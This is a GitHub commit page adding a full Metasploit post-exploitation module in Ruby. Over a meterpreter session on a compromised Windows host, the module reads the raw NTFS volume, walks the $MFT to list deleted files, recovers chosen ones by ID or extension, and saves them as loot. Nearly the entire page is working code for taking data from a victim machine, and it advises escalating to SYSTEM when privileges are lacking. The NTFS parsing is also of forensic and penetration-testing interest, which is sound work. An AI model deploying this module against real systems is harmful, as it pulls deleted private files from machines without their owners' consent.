Skip to content

Commit 567d2bb

Browse files
author
jvazquez-r7
committed
Land rapid7#1687, @bmerinofe's forensic file recovery post module
2 parents 3a7dbd7 + d360d36 commit 567d2bb

File tree

1 file changed

+399
-0
lines changed

1 file changed

+399
-0
lines changed
Lines changed: 399 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,399 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# Framework web site for more information on licensing and terms of use.
5+
# http://metasploit.com/framework/
6+
##
7+
8+
class Metasploit3 < Msf::Post
9+
10+
include Msf::Post::Windows::Priv
11+
12+
def initialize(info={})
13+
super( update_info( info,
14+
'Name' => 'Windows Gather Deleted Files Enumeration and Recovering',
15+
'Description' => %q{
16+
This module list and try to recover deleted files from NTFS file systems. Use
17+
the FILES option to guide recovery. Let it empty to enumerate deleted files in the
18+
DRIVE. Set FILES to an extension (Ex. "pdf") to recover deleted files with that
19+
extension. Or set FILES to a comma separated list of IDs (from enumeration) to
20+
recover those files. The user must have into account file enumeration and recovery
21+
could take a long time, use the TIMEOUT option to abort enumeration or recovery by
22+
extension after that time (in seconds).
23+
},
24+
'License' => MSF_LICENSE,
25+
'Platform' => ['win'],
26+
'SessionTypes' => ['meterpreter'],
27+
'Author' => ['Borja Merino <bmerinofe[at]gmail.com>'],
28+
'References' => [
29+
[ 'URL', 'http://www.youtube.com/watch?v=9yzCf360ujY&hd=1' ]
30+
]
31+
))
32+
register_options(
33+
[
34+
OptString.new('FILES',[false,'ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files.',""]),
35+
OptString.new('DRIVE',[true,'Drive you want to recover files from.',"C:"]),
36+
OptInt.new('TIMEOUT', [true,'Search timeout. If 0 the module will go through the entire $MFT.', 3600])
37+
], self.class)
38+
end
39+
40+
def run
41+
winver = sysinfo["OS"]
42+
43+
if winver =~ /2000/i
44+
print_error("Module not valid for Windows 2000")
45+
return
46+
end
47+
48+
drive = datastore['DRIVE']
49+
fs = file_system(drive)
50+
51+
if fs !~ /ntfs/i
52+
print_error("The file system is not NTFS")
53+
return
54+
end
55+
56+
if not is_admin?
57+
print_error("You don't have enough privileges. Try getsystem.")
58+
return
59+
end
60+
61+
print_status("System Info - OS: #{winver}, Drive: #{drive}")
62+
type = datastore['FILES']
63+
files = type.split(',')
64+
# To extract files from its IDs
65+
if datastore['FILES'] != "" and is_numeric(files[0])
66+
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING","FILE_FLAG_WRITE_THROUGH",0)
67+
if r['GetLastError'] == 0
68+
recover_file(files,r['return'])
69+
client.railgun.kernel32.CloseHandle(r['return'])
70+
else
71+
print_error("Error opening #{drive} GetLastError=#{r['GetLastError']}")
72+
end
73+
# To show deleted files (FILE="") or extract the type of file specified by extension
74+
else
75+
handle = get_mft_info(drive)
76+
if handle != nil
77+
data_runs = mft_data_runs(handle)
78+
vprint_status("It seems that MFT is fragmented (#{data_runs.size-1} data runs)") if (data_runs.count > 2)
79+
to = (datastore['TIMEOUT'].zero?) ? nil : datastore['TIMEOUT']
80+
begin
81+
::Timeout.timeout(to) do
82+
deleted_files(data_runs[1..-1], handle,files)
83+
end
84+
rescue ::Timeout::Error
85+
print_error("Timed out after #{to} seconds. Skipping...")
86+
end
87+
end
88+
end
89+
end
90+
91+
def get_high_low_values(offset)
92+
# Always positive values
93+
return [offset,0] if (offset < 0x1_0000_0000)
94+
# Strange Case. The MFT datarun would have to be really far
95+
return [offset & 0xffff_ffff, offset >> 32]
96+
end
97+
98+
# Recover the content of the file/files requested
99+
def recover_file(offset,handle)
100+
ra = file_system_features(handle)
101+
# Offset could be in a comma separated list of IDs
102+
0.upto(offset.size - 1) { |i|
103+
val = get_high_low_values(offset[i].to_i)
104+
client.railgun.kernel32.SetFilePointer(handle,val[0],val[1],0)
105+
rf = client.railgun.kernel32.ReadFile(handle,1024,1024,4,nil)
106+
attributes = rf['lpBuffer'][56..-1]
107+
name = get_name(attributes)
108+
print_status("File to download: #{name}")
109+
vprint_status("Getting Data Runs ...")
110+
data = get_data_runs(attributes)
111+
if data == nil or name == nil
112+
print_error("There were problems to recover the file: #{name}")
113+
next
114+
end
115+
116+
# If file is resident
117+
if data[0] == 0
118+
print_status ("The file is resident. Saving #{name} ... ")
119+
path = store_loot("resident.file", "application/octet-stream", session, data[1], name.downcase, nil)
120+
print_good("File saved on #{path}")
121+
122+
# If file no resident
123+
else
124+
# Due to the size of the non-resident files we have to store small chunks of data as we go through each of the data runs
125+
# that make up the file (save_file function).
126+
size = get_size(rf['lpBuffer'][56..-1])
127+
print_status ("The file is not resident. Saving #{name} ... (#{size} bytes)")
128+
base = 0
129+
# Go through each of the data runs to save the file
130+
file_data = ""
131+
1.upto(data.count-1) { |i|
132+
datarun = get_datarun_location(data[i])
133+
base = base+datarun[0]
134+
size = save_file([base,datarun[1]],size,file_data,handle)
135+
}
136+
#file.close
137+
path = store_loot("nonresident.file", "application/octet-stream", session, file_data, name.downcase, nil)
138+
print_good("File saved on #{path}")
139+
end
140+
}
141+
end
142+
143+
# Save the no resident file to disk
144+
def save_file(datarun,size,file_data,handle)
145+
ra = file_system_features(handle)
146+
bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
147+
distance = get_high_low_values(datarun[0]*bytes_per_cluster)
148+
client.railgun.kernel32.SetFilePointer(handle,distance[0],distance[1],0)
149+
# Buffer chunks to store in disk. Modify this value as you wish.
150+
buffer_size = 8
151+
division = datarun[1]/buffer_size
152+
rest = datarun[1]%buffer_size
153+
vprint_status("Number of chunks: #{division} Rest: #{rest} clusters Chunk size: #{buffer_size} clusters ")
154+
if (division > 0)
155+
1.upto(division) { |i|
156+
if (size>bytes_per_cluster*buffer_size)
157+
rf = client.railgun.kernel32.ReadFile(handle,bytes_per_cluster*buffer_size,bytes_per_cluster*buffer_size,4,nil)
158+
file_data << rf['lpBuffer']
159+
size = size - bytes_per_cluster * buffer_size
160+
vprint_status("Save 1 chunk of #{buffer_size*bytes_per_cluster} bytes, there are #{size} left")
161+
# It's the last datarun
162+
else
163+
rf = client.railgun.kernel32.ReadFile(handle,bytes_per_cluster*buffer_size,bytes_per_cluster*buffer_size,4,nil)
164+
file_data << rf['lpBuffer'][0..size-1]
165+
vprint_status("Save 1 chunk of #{size} bytes")
166+
end
167+
}
168+
end
169+
170+
if (rest > 0)
171+
# It's the last datarun
172+
if (size<rest*bytes_per_cluster)
173+
rf = client.railgun.kernel32.ReadFile(handle,rest*bytes_per_cluster,rest*bytes_per_cluster,4,nil)
174+
# Don't save the slack space
175+
file_data << rf['lpBuffer'][0..size-1]
176+
vprint_status("(Last datarun) Save 1 chunk of #{size}")
177+
else
178+
rf = client.railgun.kernel32.ReadFile(handle,bytes_per_cluster*rest,bytes_per_cluster*rest,4,nil)
179+
file_data << rf['lpBuffer']
180+
size = size - bytes_per_cluster * rest
181+
vprint_status("(No last datarun) Save 1 chunk of #{rest*bytes_per_cluster}, there are #{size} left")
182+
end
183+
end
184+
return size
185+
end
186+
187+
# Get the logical cluster and the offset of each datarun
188+
def get_datarun_location(datarun)
189+
190+
n_log_cluster = datarun.each_byte.first.divmod(16)[0]
191+
n_offset = datarun.each_byte.first.divmod(16)[1]
192+
193+
log_cluster = datarun[-(n_log_cluster)..-1]
194+
offset = datarun[1..n_offset]
195+
196+
log_cluster << "\x00" if (log_cluster.size % 2 != 0)
197+
offset << "\x00" if (offset.size % 2 != 0)
198+
# The logical cluster value could be negative so we need to get the 2 complement in those cases
199+
if log_cluster.size == 2
200+
int_log_cluster = log_cluster.unpack('s*')[0]
201+
elsif log_cluster.size == 4
202+
int_log_cluster = log_cluster.unpack('l')[0]
203+
end
204+
205+
if offset.size == 2
206+
int_offset = offset.unpack('v*')[0]
207+
else
208+
int_offset = offset.unpack('V')[0]
209+
end
210+
return int_log_cluster,int_offset
211+
end
212+
213+
# Go though the datarun and save the wanted files
214+
def go_over_mft(logc,offset,handle,files)
215+
dist=get_high_low_values(logc)
216+
client.railgun.kernel32.SetFilePointer(handle,dist[0],dist[1],0)
217+
1.upto(offset) { |i|
218+
# If FILE header and deleted file (\x00\x00)
219+
rf = client.railgun.kernel32.ReadFile(handle,1024,1024,4,nil)
220+
if (rf['lpBuffer'][0,4]=="\x46\x49\x4c\x45") and (rf['lpBuffer'][22,2] == "\x00\x00")
221+
name = get_name(rf['lpBuffer'][56..-1])
222+
if name!= nil
223+
print_status("Name: #{name} ID: #{logc}")
224+
# If we want to save it according to the file extensions
225+
if files != "" and files.include? File.extname(name.capitalize)[1..-1]
226+
print_good("Hidden file found!")
227+
recover_file([logc.to_s],handle)
228+
dist=get_high_low_values(logc+1024)
229+
# We need to restore the pointer to the current MFT entry
230+
client.railgun.kernel32.SetFilePointer(handle,dist[0],dist[1],0)
231+
end
232+
end
233+
# MFT entry with no FILE '\x46\x49\x4c\x45' header or its not a deleted file (dir, file, deleted dir)
234+
else
235+
logc = logc + 1024
236+
next
237+
238+
end
239+
logc = logc + 1024
240+
}
241+
end
242+
243+
# Recieve the MFT data runs and list/save the deleted files
244+
# Useful cheat_sheet to understand the MFT structure: http://www.writeblocked.org/resources/ntfs_cheat_sheets.pdf
245+
# Recap of each of the attributes: http://runenordvik.com/doc/MFT-table.pdf
246+
def deleted_files(data_runs,handle,files)
247+
ra = file_system_features(handle)
248+
bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
249+
print_status("$MFT is made up of #{data_runs.size} dataruns")
250+
base = 0
251+
real_loc = []
252+
0.upto(data_runs.size - 1) { |i|
253+
datar_info = get_datarun_location(data_runs[i])
254+
base = base+datar_info[0]
255+
vprint_status("MFT data run #{i+1} is at byte #{base*bytes_per_cluster}. It has a total of #{datar_info[1]} clusters")
256+
# Add to the beginning
257+
real_loc.unshift([base*bytes_per_cluster,(bytes_per_cluster*datar_info[1])/1024])
258+
}
259+
260+
# We start for the last data run to show quiet sooner deleted files
261+
0.upto(real_loc.size - 1) { |i|
262+
print_status("Searching deleted files in data run #{data_runs.size-i} ... ")
263+
go_over_mft(real_loc[i][0],real_loc[i][1],handle,files)
264+
}
265+
266+
print_good("MFT entries finished")
267+
client.railgun.kernel32.CloseHandle(handle)
268+
end
269+
270+
def get_name(entry)
271+
data_name = get_attribute(entry,"\x30\x00\x00\x00")
272+
return nil if data_name == nil
273+
length = data_name[88,1].unpack('H*')[0].to_i(16)
274+
return data_name[90,length*2].delete("\000")
275+
end
276+
277+
def get_size(entry)
278+
data = get_attribute(entry,"\x80\x00\x00\x00")
279+
return if data == nil
280+
return data[48,8].unpack('Q*')[0]
281+
end
282+
283+
# Gets the NTFS information and return a pointer to the beginning of the MFT
284+
def get_mft_info(drive)
285+
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING","FILE_FLAG_WRITE_THROUGH",0)
286+
287+
if r['GetLastError'] != 0
288+
print_error("Error opening #{drive} GetLastError=#{r['GetLastError']}")
289+
print_error("Try to get SYSTEM Privilege") if r['GetLastError'] == 5
290+
return nil
291+
else
292+
ra = file_system_features(r['return'])
293+
bytes_per_cluster = ra['lpOutBuffer'][44,4].unpack("V*")[0]
294+
mft_logical_offset = ra['lpOutBuffer'][64,8].unpack("V*")[0]
295+
offset_mft_bytes = mft_logical_offset * bytes_per_cluster
296+
vprint_status("Logical cluster : #{ra['lpOutBuffer'][64,8].unpack('h*')[0].reverse}")
297+
vprint_status("NTFS Volumen Serial Number: #{ra['lpOutBuffer'][0,8].unpack('h*')[0].reverse}")
298+
vprint_status("Bytes per Sector: #{ra['lpOutBuffer'][40,4].unpack('V*')[0]}")
299+
vprint_status("Bytes per Cluster: #{bytes_per_cluster}")
300+
vprint_status("Length of the MFT (bytes): #{ra['lpOutBuffer'][56,8].unpack('Q*')[0]}")
301+
vprint_status("Logical cluster where MTF starts #{mft_logical_offset}")
302+
# We set the pointer to the begining of the MFT
303+
client.railgun.kernel32.SetFilePointer(r['return'],offset_mft_bytes,0,0)
304+
return r['return']
305+
end
306+
end
307+
308+
def file_system_features(handle)
309+
fsctl_get_ntfs_volume_data = 0x00090064
310+
return client.railgun.kernel32.DeviceIoControl(handle,fsctl_get_ntfs_volume_data,"",0,200,200,4,nil)
311+
end
312+
313+
def mft_data_runs(handle)
314+
# Read the first entry of the MFT (the $MFT itself)
315+
rf = client.railgun.kernel32.ReadFile(handle,1024,1024,4,nil)
316+
# Return the list of data runs of the MFT
317+
return get_data_runs(rf['lpBuffer'][56..-1])
318+
end
319+
320+
# Receive a string pointing to the first attribute of certain file entry and returns an array of data runs
321+
# of that file. The first element will be 1 or 0 depending on whether the attribute is resident or not. If it's resident
322+
# the second element will be the content itself, otherwise (if not resident) each element will contain each of
323+
# the data runs of that file
324+
def get_data_runs(data)
325+
# We reach de DATA attribute
326+
data_runs = get_attribute(data,"\x80\x00\x00\x00")
327+
return nil if data_runs == nil
328+
print_status("File compressed/encrypted/sparse. Ignore this file if you get errors") if ["\x01\x00", "\x00\x40", "\x00\x80"].include? data_runs[12,2]
329+
# Check if the file is resident or not
330+
resident = data_runs[8,1]
331+
if resident =="\x00"
332+
inf = [0]
333+
inf << get_resident(data_runs)
334+
return inf
335+
else
336+
inf = [1]
337+
# Get the offset of the first data run from $DATA
338+
dist_datar = data_runs[32,2].unpack('v*')[0]
339+
data_run = data_runs[dist_datar..-1]
340+
# Get an array of data runs. If this array contains more than 1 element the file is fragmented.
341+
lengh_dr = data_run.each_byte.first.divmod(16)
342+
while (lengh_dr[0] !=0 && lengh_dr[1] != 0)
343+
chunk = data_run[0,lengh_dr[0]+lengh_dr[1]+1]
344+
inf << chunk
345+
data_run = data_run[lengh_dr[0]+lengh_dr[1]+1..-1]
346+
begin
347+
lengh_dr = data_run.each_byte.first.divmod(16)
348+
rescue
349+
return nil
350+
end
351+
end
352+
return inf
353+
end
354+
end
355+
356+
# Get the content of the file when it's resident
357+
def get_resident(data)
358+
start = data[20,2].unpack('v*')[0]
359+
offset = data[16,4].unpack('V*')[0]
360+
return data[start,offset]
361+
end
362+
363+
# Find the attribute requested in the file entry and returns a string with all the information of that attribute
364+
def get_attribute(str,code)
365+
0.upto(15) do |i|
366+
header = str[0,4]
367+
size_att = str[4,4].unpack('V*')[0]
368+
if header == code
369+
return str[0..size_att]
370+
else
371+
# To avoid not valid entries or the attribute doesn't not exist
372+
return nil if (size_att>1024) or header == "\xff\xff\xff\xff"
373+
str = str[size_att..-1]
374+
end
375+
end
376+
print_status("Attribute not found")
377+
return nil
378+
end
379+
380+
# Get the type of file system
381+
def file_system(drive)
382+
# BOOL WINAPI GetVolumeInformation(
383+
# _In_opt_ LPCTSTR lpRootPathName,
384+
# _Out_opt_ LPTSTR lpVolumeNameBuffer,
385+
# _In_ DWORD nVolumeNameSize,
386+
# _Out_opt_ LPDWORD lpVolumeSerialNumber,
387+
# _Out_opt_ LPDWORD lpMaximumComponentLength,
388+
# _Out_opt_ LPDWORD lpFileSystemFlags,
389+
# _Out_opt_ LPTSTR lpFileSystemNameBuffer,
390+
# _In_ DWORD nFileSystemNameSize)
391+
r = client.railgun.kernel32.GetVolumeInformationA("#{drive}//",nil,nil,nil,nil,nil,8,8)
392+
fs = r['lpFileSystemNameBuffer']
393+
return fs
394+
end
395+
396+
def is_numeric(o)
397+
true if Integer(o) rescue false
398+
end
399+
end

0 commit comments

Comments
 (0)